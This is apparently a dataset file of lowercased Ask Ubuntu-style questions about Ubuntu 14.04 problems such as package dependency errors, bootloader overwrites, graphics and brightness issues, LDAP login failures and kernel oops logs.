504356	broken nspluginwrapper package	i was trying to install citrix receiver on voyager live ( xubuntu ) 14.04 64-bit after enabling multiarch , but i get this error when i try to install nspluginwrapper : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nspluginwrapper : depends : nspluginviewer ( = 1.4.4-0ubuntu5 ) e : unable to correct problems , you have held broken packages . i tried installing the package from ubuntu software center , but i got this message : the following packages have unmet dependencies : nspluginwrapper : depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libcurl3-gnutls ( > = 7.16.2 ) but 7.35.0-1ubuntu2 is to be installed depends : libglib2.0-0 ( > = 2.35.9 ) but 2.40.0-2 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.23-0ubuntu1 is to be installed depends : nspluginviewer ( = 1.4.4-0ubuntu5 ) but it is a virtual package nspluginviewer seems to be a phantom package . i tried installing from source , but it tells me that 'glib 2.0 is not present ' although it is .
504358	accidentally wiped my hard drive during installation	hello and thank you for any help . i have a lenovo yoga 11s and i wanted to try out using ubuntu on it . i have used linux a little bit in the past , but i would still consider myself a complete novice at it . i went through the process of making the bootable usb drive and also made a separate partition for me to install ubuntu on . somehow i must have selected an option that wiped the whole drive and installed ubuntu instead of just on the partition i had made . ( i installed 14.04 if that helps ) so once that happened , i tried using the lenovo recovery button , called `` onekey '' , on my computer but that just takes me to the `` grub '' menu that has ubuntu options . i have checked the hard drive and it appears that there are no longer any windows partitions present . the hard drive partitions that i see on gparted are : sda1 , fat32 , /boot/efi , size : 512mib , used : 4.36mib sda2 , ext4 , size : 114.86gib , used : 10.82gib sda3 , linux-swap , size:3.88gib , used : 4.00 kib i do n't really have any crucial data that was on there , but i just want to have a working copy of windows available for use since that is what i am most comfortable with . i tried calling lenovo support but they said that i would have to buy a recovery disc , which costs $ 70 . please let me know if there is any other information that i could give you to further assist me . thank you !
504362	grub2 stealth install . can it be reverted ?	in a recent update to ubuntu 14.04 , my bootloader was overwritten with ubuntu 's version of grub2 . it appears to have installed itself to the mbr . setting different partitions as the active partitions appears to have had no affect . did anyone else have this problem with one of the recent updates ? before this happened , i had the windows 8 boot loader on one partition , and an opensuse version of grub 2 on another partition . switching between the two no longer does anything . i 'm stuck with the ubuntu grub2 . is there a way to revert this ? thanks
504364	high gpu load on intel haswell using ubuntu 14.04	on my sony vaio with intel haswell gpu the system gets hot with no cpu load . my fan is speeding up all the time . graphic controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) some diagnostics : usr : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +65.0°c ( crit = +97.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +67.0°c ( high = +100.0°c , crit = +100.0°c ) core 0 : +67.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +64.0°c ( high = +100.0°c , crit = +100.0°c ) usr : ~ $ usr : ~ $ render busy : 4 % : ▉ render space : 5/131072 bitstream busy : 0 % : bitstream space : 0/131072 blitter busy : 0 % : blitter space : 0/131072 task percent busy gam : 3 % : ▋ vert fetch : 0 ( 0/sec ) sf : 0 % : prim fetch : 0 ( 0/sec ) vf : 0 % : vs invocations : 4371269 ( 522/sec ) vs : 0 % : gs invocations : 0 ( 0/sec ) svg : 0 % : gs prims : 0 ( 0/sec ) gafs : 0 % : cl invocations : 1673997 ( 180/sec ) tdg : 0 % : cl prims : 1669101 ( 180/sec ) cl : 0 % : ps invocations : 776726059648 ( 48573280/sec ) ps depth pass : 193252235667 ( 12053687/sec ) so it looks like those high `` ps '' -numbers are the problem . what can i do next to analyze the problem ? using top everything seems normal .
504368	cairo-dock : how can i prevent cairo-dock from showing up on alt+tab list	it 's very annoying having cairo-dock showing in the alt + tab list . also , when i switch desktops , cairo-dock seems to be the default app selected . is there a workaround these issues ?
504370	problems with tor ppa	i 'm tried to fix a problem with tor ppa in my ubuntu 14.04 , but i ca n't . i tried to use root @ vitor-hp : ~ # lang=c dpkg -- configure -a dpkg : dependency problems prevent configuration of torchat : torchat depends on tor ; however : package tor is not installed . dpkg : error processing package torchat ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tor-geoipdb : tor-geoipdb depends on tor ( > = 0.2.4.20-1 ) ; however : package tor is not installed . dpkg : error processing package tor-geoipdb ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : torchat tor-geoipdb after i use root @ vitor-hp : ~ # lang=c apt-get install -f -y reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : python-socksipy use 'apt-get autoremove ' to remove it . the following extra packages will be installed : tor suggested packages : mixmaster xul-ext-torbutton socat tor-arm polipo privoxy apparmor-utils the following new packages will be installed : tor 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . 2 not fully installed or removed . need to get 0 b/789 kb of archives . after this operation , 2673 kb of additional disk space will be used . ( reading database ... 259372 files and directories currently installed . ) preparing to unpack ... /tor_0.2.4.20-1_amd64.deb ... unpacking tor ( 0.2.4.20-1 ) ... dpkg : error processing archive /var/cache/apt/archives/tor_0.2.4.20-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/tor ' , which is also in package tor-browser 3.5.4 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : /var/cache/apt/archives/tor_0.2.4.20-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ vitor-hp : ~ # i already use root @ vitor-hp : ~ # lang=c sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : tor-geoipdb : depends : tor ( > = 0.2.4.20-1 ) but it is not installed torchat : depends : tor but it is not installed e : unmet dependencies . try using -f. root @ vitor-hp : ~ # i use clean too root @ vitor-hp : ~ # lang=c apt-get autoclean reading package lists ... done building dependency tree reading state information ... done root @ vitor-hp : ~ # and i did this root @ vitor-hp : ~ # lang=c apt-cache policy package files : 100 /var/lib/dpkg/status release a=now 500 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ trusty/main i386 packages release v=14.04 , o=lp-ppa-libreoffice , a=trusty , n=trusty , l=libreoffice ppa , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ trusty/main amd64 packages release v=14.04 , o=lp-ppa-libreoffice , a=trusty , n=trusty , l=libreoffice ppa , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/irie/blender/ubuntu/ trusty/main i386 packages release v=14.04 , o=lp-ppa-irie-blender , a=trusty , n=trusty , l=ppa for blender 2.4 and 2.7 , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/irie/blender/ubuntu/ trusty/main amd64 packages release v=14.04 , o=lp-ppa-irie-blender , a=trusty , n=trusty , l=ppa for blender 2.4 and 2.7 , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/inkscape.dev/stable/ubuntu/ trusty/main i386 packages release v=14.04 , o=lp-ppa-inkscape.dev-stable , a=trusty , n=trusty , l=inkscape stable , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/inkscape.dev/stable/ubuntu/ trusty/main amd64 packages release v=14.04 , o=lp-ppa-inkscape.dev-stable , a=trusty , n=trusty , l=inkscape stable , c=main origin ppa.launchpad.net 500 http : //extras.ubuntu.com/ubuntu/ trusty/main i386 packages release v=14.04 , o=lp-ppa-app-review-board , a=trusty , n=trusty , l=application review board ppa , c=main origin extras.ubuntu.com 500 http : //extras.ubuntu.com/ubuntu/ trusty/main amd64 packages release v=14.04 , o=lp-ppa-app-review-board , a=trusty , n=trusty , l=application review board ppa , c=main origin extras.ubuntu.com 500 http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages release v=14.04 , o=canonical , a=trusty , n=trusty , l=partner archive , c=partner origin archive.canonical.com 500 http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages release v=14.04 , o=canonical , a=trusty , n=trusty , l=partner archive , c=partner origin archive.canonical.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/universe translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/restricted translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/multiverse translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/main translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/multiverse i386 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/universe i386 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/restricted i386 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/main i386 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/multiverse amd64 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/universe amd64 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/restricted amd64 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-security/main amd64 packages release v=14.04 , o=ubuntu , a=trusty-security , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/universe translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/restricted translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/multiverse translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/main translation-en 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/multiverse i386 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/universe i386 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/restricted i386 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/main i386 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/multiverse amd64 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/universe amd64 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/restricted amd64 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 100 http : //br.archive.ubuntu.com/ubuntu/ trusty-backports/main amd64 packages release v=14.04 , o=ubuntu , a=trusty-backports , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/universe translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/restricted translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/multiverse translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/main translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/multiverse i386 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/universe i386 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/restricted i386 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/main i386 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/multiverse amd64 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/restricted amd64 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages release v=14.04 , o=ubuntu , a=trusty-updates , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/universe translation-pt_br 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/universe translation-pt 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/universe translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/restricted translation-pt_br 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/restricted translation-pt 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/restricted translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/multiverse translation-pt_br 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/multiverse translation-pt 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/multiverse translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/main translation-pt_br 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/main translation-pt 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/main translation-en 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/multiverse i386 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/universe i386 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/restricted i386 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/main i386 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=multiverse origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=universe origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/restricted amd64 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=restricted origin br.archive.ubuntu.com 500 http : //br.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages release v=14.04 , o=ubuntu , a=trusty , n=trusty , l=ubuntu , c=main origin br.archive.ubuntu.com pinned packages : root @ vitor-hp : ~ # and i ca n't remove the tor .deb in /var/cache/apt/archives/ when i remove it root @ vitor-hp : /var/cache/apt/archives # ls lock partial tor_0.2.4.20-1_amd64.deb root @ vitor-hp : /var/cache/apt/archives # rm tor_0.2.4.20-1_amd64.deb root @ vitor-hp : /var/cache/apt/archives # ls lock partial root @ vitor-hp : /var/cache/apt/archives # and ... root @ vitor-hp : ~ # lang=c apt-get remove tor-browser reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : tor-geoipdb : depends : tor ( > = 0.2.4.20-1 ) but it is not going to be installed torchat : depends : tor but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ vitor-hp : ~ # it appear again when i boot my ubuntu after . can somebody help me to fix this ?
504371	where are the files and dirs `` recently used '' stored ?	on my ubuntu 12.04 , all the gnome applications ( such as nautilus , evince , gedit , firefox ) can access `` recently used '' files and directories , when opening files in them . i wonder where the information about `` recently used '' files and directories is stored ? i would like to access the `` recently used '' files and directories from terminal , by reading such information . kde and wine applications ca n't access `` recently used '' files and directories . i wonder why ? thanks !
504379	dns zone file issue after upgrading from ubuntu lts 12.4.4 to ubuntu lts14.04	i have 3 dns servers . the 2nd and 3rd dns servers are slave from the 1st or primary server . all my server are running ubuntu server lts12.4.4 and i would like to upgrade them to the lastest version , which is ubuntu server lts 14.04 . therefore , i follow the upgrade procedure on the 3rd dns server and the upgrade was successful . then , i need to test and make sure the slave or the transfer of the dns zone file from the primary server are working . to do that , i delete one of the domain name zone file on the 3rd dns server and then run `` sudo service bind9 restart '' . it suppose to re-create that domain name zone file and it did and i checked the log and there is no error and everything is successful . however , when i run the `` cat domain-name-zone-file '' or `` more domain-name-zone-file '' or `` vi domain-name-zone-file '' or `` nano domain-name-zone-file '' , it display binary data or the format in the domain-name-zone-file are not readable when i run the `` cat , more , vi or nano '' commands . anyone know what my issues maybe . any help will be greatly appreciated .
504380	unable to upgrade	when i tried to upgrade , getting the following error : your current hardware enablement stack ( hwe ) is going out of support on 2014-08-07 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but 10.1.3-0ubuntu0.1~precise1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but 2:1.15.1-0ubuntu2~precise1 is to be installed
504382	unity menus and fonts weird rendering	i have an issue that occurs occasionally on my ubuntu 14.04 ( x64 ) . sometimes , right when i turn on my pc , the font and windows are messy . but , if i log out and log on guest account , everything works perfectly . when i try to log back on my account , everything works great again . but i have to do it quite frequent . any ideas ? here are some screenshots : thanks !
504383	gave up waiting for root device - fresh install 14.04	i am getting the error : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/8aba9bb9ba9ba06d does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built in commands.` ( initramfs ) _ i have attempted many of the solutions provided in the other copies of this question but i have an additional complication which prevents me from performing the most common solutions . i can not type commands in the initramfs prompt . my keyboard works fine for grub but once i get to this prompt pressing keys produces no results .
504389	thunderbird problem	i get the following message when i click on getmail . however , the inbox is already empty . i also get a similar message when i try to delete a message '' the folder inbox is full , and ca n't hold any more messages . to make room for more messages , delete any old or unwanted mail and compact the folder . ''
504391	brightness keys registering , but no effect	i have ( very ) recently installed ubuntu , and am having some issues with the brightness . i 'm using an hp probook - the brightness keys are being registered no problem , and when i go into brightness & lock the slider acts normally . however , this does not change the brightness of the screen at all . no matter how dark i wish to set the screen , it remains at 100 % . the research i 've done mostly shows people who have issues where the keys are n't working at all , which is n't my issue . the only way i can change the brightness at all is by using the following command in terminal : xrandr -- output lvds1 -- brightness 0.5 obviously it 's inconvenient to do this every time i wish to change the brightness ; is there another solution ?
504393	video lag with unity as the default desktop ?	i never had this issue in mint ( xfce , cinnamon ) or xubuntu , but now after installing unity , fresh install of ubuntu 14.04.1 , when ever i move the cursor while a video ( youtube , twitch tv ) is playing , the video lags , as in around 1 fps . audio stays fine , just the video lags . i know its not an issue with using too much ram because 4 gb was plenty in the past to handle unity .
504394	kerneloops general protection fault	i have had ubuntu installed on my system for the past few weeks and i keep getting a kerneloops general protection fault . i think it is related to my amd raedon hd 5650 because i took it out of my computer and experienced no kerneloops . i have had this card for 5 years and recently migrated to a 64 bit os , so i do n't know if that 's what is causing my issue . i found this when looking in sys.log kernel : [ 1041.562002 ] general protection fault : 0000 [ # 1 ] smp kernel : [ 1041.562004 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) rfcomm bnep bluetooth binfmt_misc joydev hid_microsoft usbhid hid snd_hda_codec_hdmi eeepc_wmi asus_wmi sparse_keymap mxm_wmi x86_pkg_temp_thermal intel_powerclamp coretemp kvm crct10dif_pclmul snd_hda_codec_realtek crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_hda_intel snd_hda_codec snd_hwdep snd_pcm serio_raw snd_page_alloc snd_seq_midi snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device snd_timer fglrx ( pof ) snd mei_me mei soundcore amd_iommu_v2 parport_pc video ppdev mac_hid acpi_pad wmi lp parport e1000e ahci psmouse ptp libahci pps_core kernel : [ 1041.562025 ] cpu : 1 pid : 2476 comm : cipcserver : :thr tainted : pf o 3.13.0-32-generic # 57-ubuntu kernel : [ 1041.562026 ] hardware name : asus all series/z97-a , bios 0604 04/15/2014 kernel : [ 1041.562027 ] task : ffff88020f37dfc0 ti : ffff8800a8808000 task.ti : ffff8800a8808000 kernel : [ 1041.562028 ] rip : 0010 : [ < ffffffff8117cce5 > ] [ < ffffffff8117cce5 > ] vma_compute_subtree_gap+0x15/0x50 kernel : [ 1041.562032 ] rsp : 0018 : ffff8800a8809d78 eflags : 00010286 kernel : [ 1041.562033 ] rax : 00000000dbc00000 rbx : ffff88002c58ece0 rcx : ffff88002c58ec20 kernel : [ 1041.562034 ] rdx : fff78800a5ab30c0 rsi : ffff88002c58eb40 rdi : ffff88002c58ecc0 kernel : [ 1041.562034 ] rbp : ffff8800a8809d78 r08 : ffff88002c58ec20 r09 : ffff88002c58eb40 kernel : [ 1041.562035 ] r10 : 00000000dbdfa000 r11 : 0000000000100073 r12 : ffff88002c58eb60 kernel : [ 1041.562036 ] r13 : ffff8800a6573b80 r14 : 000000007e3e0000 r15 : ffff88002c58ec20 kernel : [ 1041.562037 ] fs : 0000000000000000 ( 0000 ) gs : ffff88023ec80000 ( 0063 ) knlgs:00000000e8344b40 kernel : [ 1041.562037 ] cs : 0010 ds : 002b es : 002b cr0 : 0000000080050033 kernel : [ 1041.562038 ] cr2 : 00000000dbc3f002 cr3 : 000000022f33c000 cr4 : 00000000001407e0 kernel : [ 1041.562039 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 kernel : [ 1041.562039 ] dr3 : 0000000000000000 dr6 : 00000000fffe0ff0 dr7 : 0000000000000400 kernel : [ 1041.562040 ] stack : kernel : [ 1041.562040 ] ffff8800a8809db0 ffffffff8117d990 ffff8800a6573b80 ffff88002c58eb40 kernel : [ 1041.562042 ] ffff88002c58ec20 ffff88002c58ec28 ffff88002c58ec00 ffff8800a8809df0 kernel : [ 1041.562043 ] ffffffff8117da7f ffffffff8117fe58 ffff88002c58ec28 00000000dbd79000 kernel : [ 1041.562044 ] call trace : kernel : [ 1041.562047 ] [ < ffffffff8117d990 > ] __vma_link_rb+0xa0/0xe0 kernel : [ 1041.562049 ] [ < ffffffff8117da7f > ] vma_link+0xaf/0xc0 kernel : [ 1041.562050 ] [ < ffffffff8117fe58 > ] ? mmap_region+0x348/0x600 kernel : [ 1041.562052 ] [ < ffffffff8117ff81 > ] mmap_region+0x471/0x600 kernel : [ 1041.562053 ] [ < ffffffff8118045e > ] do_mmap_pgoff+0x34e/0x3d0 kernel : [ 1041.562055 ] [ < ffffffff8116ab8d > ] vm_mmap_pgoff+0x8d/0xc0 kernel : [ 1041.562057 ] [ < ffffffff8117e996 > ] sys_mmap_pgoff+0x116/0x270 kernel : [ 1041.562059 ] [ < ffffffff8172e36c > ] sysenter_dispatch+0x7/0x21 kernel : [ 1041.562060 ] code : 38 e2 00 48 89 e5 31 c0 48 85 d2 48 0f 49 c2 5d c3 0f 1f 44 00 00 0f 1f 44 00 00 48 8b 57 18 55 48 8b 07 48 89 e5 48 85 d2 74 04 < 48 > 2b 42 08 48 8b 57 30 48 85 d2 74 0b 48 8b 52 18 48 39 d0 48 kernel : [ 1041.562072 ] rip [ < ffffffff8117cce5 > ] vma_compute_subtree_gap+0x15/0x50 kernel : [ 1041.562073 ] rsp < ffff8800a8809d78 > kernel : [ 1041.562075 ] -- - [ end trace e262774f21387539 ] -- - i have tried reinstalling graphics card drivers , ran memtest , did a check of my filesystem , but nothing has corrected the problem . can somebody help me ?
504396	video suddenly unaccelerated , wrong resolution	lubuntu 14.04 fully up to date . it was working fine until i turned on my laptop today and the screen was 1024x768 instead of the native 1280x800 , unaccelerated . lxrandr shows 1024x768 as the only available resolution . lspci output : 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs690m [ radeon xpress 1200/1250/1270 ] lsmod shows that the radeon module is loaded . any ideas ? ( yes i did turn it off and on again ! )
504397	updating from 8.10 intrepid	hello everybody ~ i am fresh off the newbie tree and waving good bye to windows through the rear view mirror . i just started up an old machine that has a fresh install of 8.10 on it and has never been used since . as far as i can tell there is no gui desktop on it . i would like to update it to the latest , 14.x ? how do i update ? do i just over write the 8.10 with the latest ? do i wipe the 8.10 first then install ? can anyone please advise on this ? many thanks .
504399	no menu bar and unity launch after upgrading to 14.04 ; ccsm can not start	yesterday i upgraded from 12.10 to 14.04 by do-release-upgrade . things were ok after the upgrading . however today when i logged into my account , no menu bar , no unity launch . i tried ctrl+alt+f1 to open the terminal and re-installed ubuntu-desktop , but it did n't help . then i installed compizconfig-settings-manager . but ccsm failed with the error message could not open display . the only good news was that when i logged in as guest , the desktop worked fine . what can i do now ? updates : first thank you all . according to upgrade from 13.10 to 14.04 no unity dash for default user special compiz config , i deleted ~/.config/dconf/user and ~/.cache/compizconfig-1 and the problem was solved . i think this was caused by my own configuration files . and definitely bain 's method will work too . i opened tty because i failed to run terminal by ctrl+alt+t . i did n't realize ccsm could n't work in that situation . thank you once again .
504401	lightdm login fails for ldap users	when trying to log onto a kubuntu 14.04 lts system . i noticed that all users would pass , when logging in via ssh , but graphical login ( i.e . lightdm with the kde greeter ) would just be possible for local accounts . more precise : ldap users would be authenticated with ease , but then kde plasma would not start up . the relevant lines of the log file : # /var/log/lightdm/lightdm.log debug : seat : failed to find session configuration default debug : seat : ca n't find session 'default' the lines do not show up when local accounts log in . how to fix this ? explanations ?
504405	acer aspire one , system slow . graphics problem ?	i have a acer aspire one intel atom cpu n280 1.66ghz 2gb ram video : intel mobile 945gse express integrated graphics controller it was running windows vista before , and was very slow . i tried to change to ubuntu , but is even slower . this computer is even certified in ubuntu website : http : //www.ubuntu.com/certification/hardware/200908-3469/ i installed the 32-bits as recomended for 2gb ram . the system works well , showing only problems in graphic parts , such as minimizing windows and opening the search window . edit : i have searched the forum and i have seen many similar problems . and believe that problems are the graphic drivers and / or graphic efects . none of the other questions helped the system monitor is is showing the cpu usage at 100 % constantly
504408	mtp android mount	using my android lg g2 i have been trying to mount via mtp and have not found an easy way . does anyone have a simple solution to this problem ? edit : looking for a gui application
504410	tomcat shartup.sh command says permisison denied	i have set catalina_home in ~/.bashrc file but on running $ catalina_home/bin/startup.sh command it produces output like : bash : /home/ravinder/java_folder/important_programs/servers/tomcat7/bin/startup.sh : permission denied any help would be of great help .
504411	installing ubuntu on lenovo y410p	i 'm thinking of buying this computer and doing a dual boot with linux and windows 8 . in all of the forums that i have read i found out that its hard to do . if anyone can please tell how to install ubuntu on lenovo y410p i would greatly appreciate it .
504413	what is the fastest two way sync framework available on ubuntu ?	hypothetical situation : three remote computers syncing one document . each computer is 100ms ping apart . first computer hosts server this is two way sync . document is set that any change , even if it is just one character input , that it immediately saves . upon document change , the files are synced/merged . one suggestion per answer . speed is the top priority and will serve as the watermark for the best answer , however , pros and cons should be listed with every answer because if the difference in speed is negligible , then other features will be used to determine the best answer . i would encourage all suggestions to be listed , even if they are not faster , to benefit other users who are currently researching .
504414	znes emulator freezes midgame and wo n't respond afterwards	i recently installed zsnes emulator and every time i run it , approximately 30 to 40 minutes into the game it freezes and wo n't respond any longer . as soon as this happens my computer immediately starts overheating and generally every process slows down . furthermore it wo n't let me terminate zsnes , whether i try to do it through the `` x '' button or the terminal . in fact there is nothing i can do to stop this short of force rebooting my computer . it happens every time . i did a quick search on google and it seems that many people have had a similar problem but i have n't found a good solution yet ( except someone suggesting to install the windows version on wine - something that i 'd rather not do ) . i 'd appreciate any suggestion on how to fix this problem or any other snes emulator i could use instead .
